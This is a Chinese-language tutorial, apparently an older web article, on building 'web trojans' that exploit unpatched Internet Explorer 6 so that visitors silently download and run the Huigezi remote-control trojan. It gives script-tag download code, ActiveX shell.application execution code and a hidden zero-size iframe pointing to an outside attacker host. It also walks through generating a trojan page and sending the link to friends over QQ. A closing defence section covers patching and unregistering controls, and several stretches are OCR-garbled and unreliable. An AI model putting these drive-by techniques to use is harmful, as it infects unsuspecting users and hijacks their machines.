網(wǎng)頁(yè)木馬制作全過(guò)程（詳細(xì)）如果你訪問(wèn)XX網(wǎng)站（國(guó)內(nèi)某門戶網(wǎng)站），你就會(huì)中灰鴿子木馬。這是我一黑客朋友給我說(shuō)的一句說(shuō)。打開(kāi)該網(wǎng)站的首頁(yè)，經(jīng)檢查，我確實(shí)中了灰鴿子。怎么實(shí)現(xiàn)的呢？他說(shuō)，他侵入了該網(wǎng)站的服務(wù)器并在網(wǎng)站主頁(yè)上掛了網(wǎng)頁(yè)木馬；一些安全專家常說(shuō)，不要打開(kāi)陌生人發(fā)來(lái)的網(wǎng)址，為什么？因?yàn)樵摼W(wǎng)址很有可能就是一些不懷好意者精心制作的網(wǎng)頁(yè)木馬。以上只是網(wǎng)頁(yè)木馬的兩種形式，實(shí)際上網(wǎng)頁(yè)木馬還可以掛在多媒體文件（RM、RMVB、WMV、WMA、Flash）、電子郵件、論壇等多種文件和場(chǎng)合上。很可怕吧，那么用戶如何防范網(wǎng)頁(yè)木馬呢？下面我們就先從網(wǎng)頁(yè)木馬的攻擊原理說(shuō)起。一、網(wǎng)頁(yè)木馬的攻擊原理首先明確，網(wǎng)頁(yè)木馬實(shí)際上是一個(gè)HTML網(wǎng)頁(yè)，與其它網(wǎng)頁(yè)不同的是該網(wǎng)頁(yè)是黑客精心制作的，用戶一旦訪問(wèn)了該網(wǎng)頁(yè)就會(huì)中木馬。為什么說(shuō)是黑客精心制作的呢？因?yàn)榍度朐谶@個(gè)網(wǎng)頁(yè)中的腳本恰如其分地利用了IE瀏覽器的漏洞，讓IE在后臺(tái)自動(dòng)下載黑客放置在網(wǎng)絡(luò)上的木馬并運(yùn)行（安裝）這個(gè)木馬，也就是說(shuō)，這個(gè)網(wǎng)頁(yè)能下載木馬到本地并運(yùn)行（安裝）下載到本地電腦上的木馬，整個(gè)過(guò)程都在后臺(tái)運(yùn)行，用戶一旦打開(kāi)這個(gè)網(wǎng)頁(yè)，下載過(guò)程和運(yùn)行（安裝）過(guò)程就自動(dòng)開(kāi)始。有朋友會(huì)說(shuō)，打開(kāi)一個(gè)網(wǎng)頁(yè)，IE瀏覽器真的能自動(dòng)下載程序和運(yùn)行程序嗎？如果IE真的能肆無(wú)忌憚地任意下載和運(yùn)行程序，那天下還不大亂。實(shí)際上，為了安全,IE瀏覽器是禁止自動(dòng)下載程序特別是運(yùn)行程序的，但是，IE瀏覽器存在著一些已知和未知的漏洞，網(wǎng)頁(yè)木馬就是利用這些漏洞獲得權(quán)限來(lái)下載程序和運(yùn)行程序的。下面我舉IE瀏覽器早期的一個(gè)漏洞來(lái)分別說(shuō)明這兩個(gè)問(wèn)題。1?自動(dòng)下載程序〈SCRIPTLANGUAGE二"icyfoxlovelace"src="/l.exe"〉〈/SCRIPT〉小提示：代碼說(shuō)明代碼中“src”的屬性為程序的網(wǎng)絡(luò)地址，本例中“/l.exe”為我放置在自己Web服務(wù)器上的灰鴿子服務(wù)端安裝程序，這段代碼能讓網(wǎng)頁(yè)下載該程序到瀏覽它的電腦上。也可以把木馬程序上傳到免費(fèi)的主頁(yè)空間上去，但免費(fèi)空間出于安全的考慮，多數(shù)不允許上傳exe文件，黑客可能變通一下把擴(kuò)展名exe改為bat或com，這樣他們就可以把這些程序上傳到服務(wù)器上了。把這段代碼插入到網(wǎng)頁(yè)源代碼的〈/BODY〉???〈/BODY〉之間（如圖1）,然后用沒(méi)打補(bǔ)丁的IE6打開(kāi)，接下來(lái)，打開(kāi)IE的臨時(shí)目錄〈TemporaryInternetFiles〉，你會(huì)發(fā)現(xiàn)，在該文件夾中有一個(gè)“l(fā).exe”文件,這也就是說(shuō)，該網(wǎng)頁(yè)已自動(dòng)下載了我放置在Web服務(wù)器上的灰鴿子木馬。

燈門L笳燈門L笳呆町.哥■們</HEm<5CRll*TLRHGUfiGE-BricyFaxlou?Ldce“sr￡-BBhtt!(j：</gol63giOi_uicp.irE-t/ixexeBB></5GRIPT></DOD￥></HTHl?圖1網(wǎng)頁(yè)木馬示例小提示：灰鴿子木馬為什么一定要用灰鴿子木馬呢？因?yàn)榛银澴邮欠磸椥湍抉R，該木馬能繞過(guò)天網(wǎng)等大多數(shù)防火墻的攔截，中馬后，服務(wù)端即被控端能主動(dòng)連接控制端(客戶端)，也就是說(shuō)，一旦被控端連接到Internet,在控制端那里，被控端就會(huì)“自動(dòng)上線”(如圖2)。最<1搜索內(nèi)容目動(dòng)上線主機(jī)jj自動(dòng)上線主.+文件Q設(shè)置⑥工具①、幫助⑩0搜索結(jié)果包噩配置服務(wù)程序當(dāng)前連接：如N最<1搜索內(nèi)容目動(dòng)上線主機(jī)jj自動(dòng)上線主.+文件Q設(shè)置⑥工具①、幫助⑩0搜索結(jié)果包噩配置服務(wù)程序當(dāng)前連接：如N12CI.4T.T2-上海爻 電胞名稱：VSN-226-03連接密碼：?文件目錄瀏覽文件管理器遠(yuǎn)程控制命令?建冊(cè)表編輯器命令廣播已馬看一亙上網(wǎng)，I甲遲我的電腦J疼這亙瑩會(huì)自動(dòng)上翌丿r啖E-5E3Qf+ 3D:+ ；E:+ 3F:+r■SwiHIiOWS.I^JProgr：=ifTiFileE.MyIlnr1JJTIent￡i>JMATLAERU二RAVBDTdedowrild.tmp^jMATLAESpl'jFROVIEW?Recycled囂線捕囂幕謹(jǐn)音卓圖2灰鴿子控制短示例(汗！又一大毒梟:))2.自動(dòng)運(yùn)行程序<SCRIPTLANGUAGE="javascript"type="text/javascript">varshell=newActiveXObject("shell.application");space("c:\\Windows\\").items().item("Notepad.exe").invokeverb();</SCRIPT>把這段代碼插入到網(wǎng)頁(yè)源代碼的〈/B0DY〉???〈/B0DY〉之間，然后用IE打開(kāi)該網(wǎng)頁(yè)，你會(huì)發(fā)現(xiàn)，這段代碼可以在沒(méi)有打相關(guān)補(bǔ)丁的IE6中自動(dòng)打開(kāi)記事本。這段代碼使用了shell.application控件，該控件能使網(wǎng)頁(yè)獲得執(zhí)行權(quán)限，替換代碼中的“Notepad.exe”（記事本）程序，可以用它自動(dòng)運(yùn)行本地電腦上的任意程序。通過(guò)以上的代碼我們可以看出，利用IE的漏洞，也就是說(shuō)在網(wǎng)頁(yè)中插入適當(dāng)?shù)拇a，IE完全可以自動(dòng)下載和運(yùn)行程序，不過(guò)，IE一旦打了相關(guān)補(bǔ)丁，這些代碼就會(huì)失去作用。另外，這些代碼要運(yùn)行和下載程序，有些殺毒軟件的網(wǎng)頁(yè)監(jiān)控會(huì)視它們?yōu)椴《荆瑸榱颂颖茏窔?，黑客可能?huì)使用一些工具對(duì)網(wǎng)頁(yè)的源代碼進(jìn)行加密處理（如圖3）。西禪頁(yè)嵐碼111瞪*f至』 iic.t<a3-pfl￡nterniet丈西禪頁(yè)嵐碼111瞪*f至』 iic.t<a3-pfl￡nterniet丈it悄 頑蜓⑥號(hào)看血專祗皿 tfWlQfi進(jìn)娜|全選?:廉泡覽貢1屯.翌陽(yáng)憐！色蚪■■!：.'理E.IT姐p-D'DCHO.ht*網(wǎng)頁(yè)代砒密瞬的丸旳隔心育： ?: 二■；：=-JL■看不WM4ff, JOAdacu>ent-卩耳日.text.val-u^K3EiE2rX-ySpSTKijSTSSXmr9%. 齊.卞udEESXuTBOLSuFFKXuBBFTlulAnbXu^[?34g也M釣加曲希亦?,_=十22ea^iltJC28?29?22*2ClDDM29*犯SdMXDASTDIfCl您0A4"廠二禎Ku8BF7NuBF93%u5165Kuffi90iu658T5C^EFt?ii4EE3*u?8BLK2?K._ mOMOAfunctiDrX20sanpi1^28X29^20/tfc2DTht%201t22C?pL<^^23*?D*/*0IK0Mt7BS0MDAdocu*siit.pad.teat.valurt3E?2T?2TS5BK0M0lcoi|>ilatiota3Dasc^rtZBcode^E^SBSOMOAdocwiieni:「pad.tsat.val-ueS3W22JKscript*3EK5CnJEJa?21—tSCEutoiMent?vritflt?Bune3capflW?K5C?22?22+cgwilalign^22*5ai2??29?29*JBKrcn//--*3Bt5GiSfi3CS5C/wEiptl?3EK22?HMQpsiui屮/BsOiMM.i亡刊晡羽訕辭旅誡丁旨課詬E仲諂2伽述環(huán)61訕國(guó)濮?尿黑燈荊訊測(cè) L%22K29X3B?mOJJK7MOM-OAfiinEt工□用20￡41ecttDd&X28x29ftW^20S?lec-t伽譯20K22C口呻訂ati^22t2:Ofos^20Capyi^%2Di/1tOMS!OA^7MODaOAifS2edfleuHeftt. ttJit.沁h(yuǎn)it.l&^gthK3EO?25^IWOASTB?QEttOAd0CUAerLt-p&d.tex^?i-3^uJI2??2?13^D!WOAcbeuKtrnoDaitsxt.aelect%233t29S3B%0Llt0AAlwfc?D49Aelf?* frrt/2；S：--:目暢彌*隹譯?國(guó)通回岀兇童].■]/?；-艾際炊嗽*ysff / -幽I「——二圖3加密后的網(wǎng)頁(yè)代碼二、網(wǎng)頁(yè)木馬的基本用法理解了網(wǎng)頁(yè)木馬攻擊的原理，我們可以制作自己的網(wǎng)頁(yè)木馬，但這需要你根據(jù)IE漏洞寫(xiě)出利用代碼。實(shí)際上，在網(wǎng)上有很多高手已寫(xiě)出了一些漏洞的利用代碼，有的還把它寫(xiě)成了可視化的程序。在搜索引擎輸入“網(wǎng)頁(yè)木馬生成器”進(jìn)行搜索，你會(huì)發(fā)現(xiàn)，在網(wǎng)上有很多利用IE的各種漏洞編寫(xiě)的網(wǎng)頁(yè)木馬生成器，它們大都為可視化的程序，只要你有一個(gè)木馬（該木馬必須把它放置到網(wǎng)絡(luò)上），利用這些生成器你就可以立即生成一個(gè)網(wǎng)頁(yè)，該網(wǎng)頁(yè)就是網(wǎng)頁(yè)木馬，只要他人打開(kāi)這個(gè)網(wǎng)頁(yè)，該網(wǎng)頁(yè)就可以自動(dòng)完成下載木馬并運(yùn)行（安裝）木馬的過(guò)程。在我的電腦上我已下載了一個(gè)網(wǎng)頁(yè)木馬生成器，下面我們來(lái)看怎么生成網(wǎng)頁(yè)木馬并讓他人中木馬。第一步：?jiǎn)?dòng)該網(wǎng)頁(yè)木馬生成器，如圖4所示，在文本框中輸入木馬的網(wǎng)絡(luò)地址，最后單擊“生成”。圖4網(wǎng)頁(yè)木馬生成器第二步：在網(wǎng)頁(yè)木馬生成器的安裝文件夾會(huì)生成一個(gè)網(wǎng)頁(yè)文件，該文件就是我們?cè)谏弦徊缴傻木W(wǎng)頁(yè)木馬。上傳該文件到自己的Web服務(wù)器或免費(fèi)主面空間。現(xiàn)在好了，把上述網(wǎng)頁(yè)在服務(wù)器上的地址（網(wǎng)址）通過(guò)QQ發(fā)給自己的好友，一旦他訪問(wèn)了該網(wǎng)頁(yè)，該網(wǎng)頁(yè)就會(huì)在他的電腦上自動(dòng)下載并運(yùn)行你放置在網(wǎng)絡(luò)上的木馬?，F(xiàn)在你該明白安全專家勸告的“不要打開(kāi)陌生人發(fā)來(lái)的網(wǎng)絡(luò)地址”這句話的真諦了吧！實(shí)際上，即使人人都不打開(kāi)陌生人發(fā)來(lái)的網(wǎng)址，也仍然有一些人“飛蛾補(bǔ)燈，自尋死路”，因?yàn)槿舸蟮腎nternet,總會(huì)有一些人會(huì)有意或無(wú)意地訪問(wèn)這些網(wǎng)址，而且，有些網(wǎng)頁(yè)木馬，還掛在一些知名網(wǎng)站上（根據(jù)知名網(wǎng)站的訪問(wèn)量，你算算吧，每天有多少人中了木馬?。Ｐ√崾荆耗憧赡苓€沒(méi)想到，看電影，在論壇查看或回復(fù)帖子也能中木馬。實(shí)際上，網(wǎng)頁(yè)木馬還可以掛在多媒體文件、電子郵件、論壇、CHM電子書(shū)上，這樣，用戶一旦觀看電影、查看或預(yù)覽郵件（主要是一些用電子郵件群發(fā)器發(fā)送的垃圾郵件）、參與帖子，打開(kāi)電子書(shū)，用戶就會(huì)中網(wǎng)頁(yè)木馬。在下面我們只介紹黑客如何在知名網(wǎng)站上掛網(wǎng)頁(yè)木馬。下面來(lái)看這一段代碼：iframesrc="/hk.htm"width二"0"height二"0"frameborder二"0"〉〈/iframe〉小提示：“src”的屬性“http://gol63go.vicp.net/hk.htm”是上傳到服務(wù)器上的網(wǎng)頁(yè)木馬的網(wǎng)址。把這段代碼插入到某門戶網(wǎng)站首頁(yè)源代碼的〈/B0DY〉???〈/B0DY〉之間，從表面上看，插入后該門戶的首頁(yè)并沒(méi)有什么變化，但是，所有訪問(wèn)了該門戶網(wǎng)站首頁(yè)的人都會(huì)中木馬，為什么會(huì)這樣呢？這是因?yàn)檫@段代碼中〈iframe〉標(biāo)簽把網(wǎng)頁(yè)木馬網(wǎng)頁(yè)隱藏性地“包含”在了插入代碼的網(wǎng)頁(yè)當(dāng)中?！磇frame〉也叫浮動(dòng)幀標(biāo)簽，它可以把一個(gè)HTML網(wǎng)頁(yè)嵌入到另一個(gè)網(wǎng)頁(yè)里實(shí)現(xiàn)“畫(huà)中畫(huà)”的效果（如圖5）,被嵌入的網(wǎng)頁(yè)可以控制寬、高以及邊框大小和是否出現(xiàn)滾動(dòng)條等。在上代代碼中，因?yàn)榘褜挘╳idth）、高（height）、邊框（frameborder）都設(shè)置為了“0”，所以，上述代碼插入到門戶網(wǎng)站的首頁(yè)后，網(wǎng)站的首頁(yè)不會(huì)發(fā)生變化，但是，由于嵌入的網(wǎng)頁(yè)實(shí)際上已經(jīng)打開(kāi)了，所以網(wǎng)頁(yè)上的下載木馬和運(yùn)行木馬的腳本還是會(huì)隨著門戶首頁(yè)的打開(kāi)而執(zhí)行的。圖5iframe標(biāo)簽示例也許有人會(huì)問(wèn)，如何把上述代碼插入到門戶網(wǎng)站首頁(yè)的源代碼中？這個(gè)問(wèn)題問(wèn)得好，本人才疏學(xué)淺，確實(shí)無(wú)法進(jìn)入他們的服務(wù)器修改網(wǎng)頁(yè)，但是黑客如果發(fā)現(xiàn)了這些服務(wù)器上的漏洞且獲得了webshell權(quán)限，那么修改他們的網(wǎng)頁(yè)就跟在本地制作一個(gè)網(wǎng)頁(yè)一樣容易。有人還問(wèn)，拿到服務(wù)器的webshell權(quán)限容易嗎？如果你對(duì)網(wǎng)絡(luò)安全比較關(guān)注，你會(huì)發(fā)現(xiàn)，經(jīng)常有這個(gè)網(wǎng)站被黑了，那個(gè)網(wǎng)站的主頁(yè)被修改了的新聞爆出。有人還問(wèn)，門戶的服務(wù)器幾乎無(wú)漏洞可找，個(gè)人服務(wù)器的漏洞較多，你能進(jìn)入嗎？本人不是黑客，中華人民共和國(guó)的法律規(guī)定，入侵和篡改他人服務(wù)器上的信息是違法行為，希望大家共同維護(hù)網(wǎng)絡(luò)安全。以前，在網(wǎng)上打開(kāi)一些有名的網(wǎng)站時(shí)殺毒軟件也會(huì)報(bào)警，現(xiàn)在你明白其中的道理了吧。有些人在這些網(wǎng)站發(fā)帖子罵娘，看了本文，希望在罵娘時(shí)你也能為那些墊背的站長(zhǎng)想想。三：網(wǎng)頁(yè)木馬的防范策略網(wǎng)頁(yè)木馬的防范只靠殺毒軟件和防火墻是遠(yuǎn)遠(yuǎn)不夠的，因?yàn)橐坏┖诳褪褂昧朔磸椂丝诘膫€(gè)人版木馬（個(gè)人反匯編的一些殺毒軟件無(wú)法識(shí)別的木馬），那么殺毒軟件和防火墻就無(wú)可奈何，所以，網(wǎng)頁(yè)木馬的防范要從它的原理入手，從根子上進(jìn)行防范。㈠即時(shí)安裝安全補(bǔ)丁網(wǎng)頁(yè)木馬都是利用IE漏洞進(jìn)行傳播的，我們拿冰狐浪子的網(wǎng)頁(yè)木馬（用“冰狐浪子網(wǎng)頁(yè)木馬生成器”制作的網(wǎng)頁(yè)木馬）來(lái)說(shuō)吧，該網(wǎng)頁(yè)能繞過(guò)IE的安全設(shè)置，當(dāng)用戶連接到該網(wǎng)頁(yè)時(shí)，它能在普通用戶不知情的情況下在后臺(tái)下載一個(gè)木馬并運(yùn)行（安裝）該木馬。所以，經(jīng)常到微軟網(wǎng)站去下載并安裝最新的安全補(bǔ)丁是防范網(wǎng)頁(yè)木馬比較有效的辦法。㈡改名或卸載（反注冊(cè)）最不安全的ActiveXObject（IE插件）在系統(tǒng)中有些ActiveXObject會(huì)運(yùn)行EXE程序，比如本文中“自動(dòng)運(yùn)行程序”代碼中的Shell.application控件，這些控件一旦在網(wǎng)頁(yè)中獲得了執(zhí)行權(quán)限，那么它就會(huì)變?yōu)槟抉R運(yùn)行的“溫床”，所以把這些控件改名或卸載能徹底防范利用這些控件的網(wǎng)頁(yè)木馬。但是ActiveXObject是為了應(yīng)用而出現(xiàn)的，而不是為了攻擊而出現(xiàn)的，所有的控件都有它的用處，所以在改名或卸載一個(gè)控件之前，你必須確認(rèn)這個(gè)控件是你不需要的，或者即使卸載了也不關(guān)大體的。1.卸載（反注冊(cè)）ActiveXObject第一步：在“開(kāi)始”菜單上單擊“運(yùn)行”，輸入“CMD”命令打開(kāi)命令提示符窗口。第二步：在命令提示符下輸入“regsvr32.exeshell32.dll/u/s”，然后回車就能將Shell.application控件卸載。如果日后我們希望繼續(xù)使用這個(gè)控件的話，可以在命令提示符窗口中輸入“regsvr32.exeshell32.dll/i/s”命令將它們重新安裝（注冊(cè)）。在上述命令中：“regsvr32.exe”是注冊(cè)或反注冊(cè)O(shè)LE對(duì)象或控件的命令，［/u］是反注冊(cè)參數(shù)，［/s］是寂靜模式參數(shù)，［/I］為安裝參數(shù)。2.改名ActiveXObject需要說(shuō)明的是，改名一個(gè)控件時(shí)，控件的名稱和CLSID（ClassID）都要改，并且要改徹底了。下面仍以Shell.application為例來(lái)介紹方法。第一步